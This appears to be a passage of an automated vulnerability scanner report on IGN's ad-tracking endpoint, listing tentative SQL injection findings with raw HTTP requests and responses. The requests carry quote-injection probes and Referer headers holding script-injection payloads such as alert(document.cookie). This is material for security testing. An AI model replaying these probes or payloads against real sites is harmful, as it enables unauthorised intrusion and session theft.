Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwmijfx,bguRragewbmAI HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:34 GMT
Connection: close
Vary: Accept-Encoding


1.28. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=chdstlw,bguRrblewbsus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=chdstlw,bguRrblewbsus

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=chdstlw,bguRrblewbsus HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:57 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=chdstlw,bguRrblewbsus HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:57 GMT
Connection: close
Vary: Accept-Encoding


1.29. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cadvdIl,bguRqRgbdmoWo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cadvdIl,bguRqRgbdmoWo

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cadvdIl,bguRqRgbdmoWo HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:16 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cadvdIl,bguRqRgbdmoWo HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:16 GMT
Connection: close
Vary: Accept-Encoding


1.30. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cjkIIec,bguRrfrbdmWab [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cjkIIec,bguRrfrbdmWab

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cjkIIec,bguRrfrbdmWab HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cjkIIec,bguRrfrbdmWab HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding


1.31. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bynKldq,bguRragewbmAn [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bynKldq,bguRragewbmAn

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bynKldq,bguRragewbmAn HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
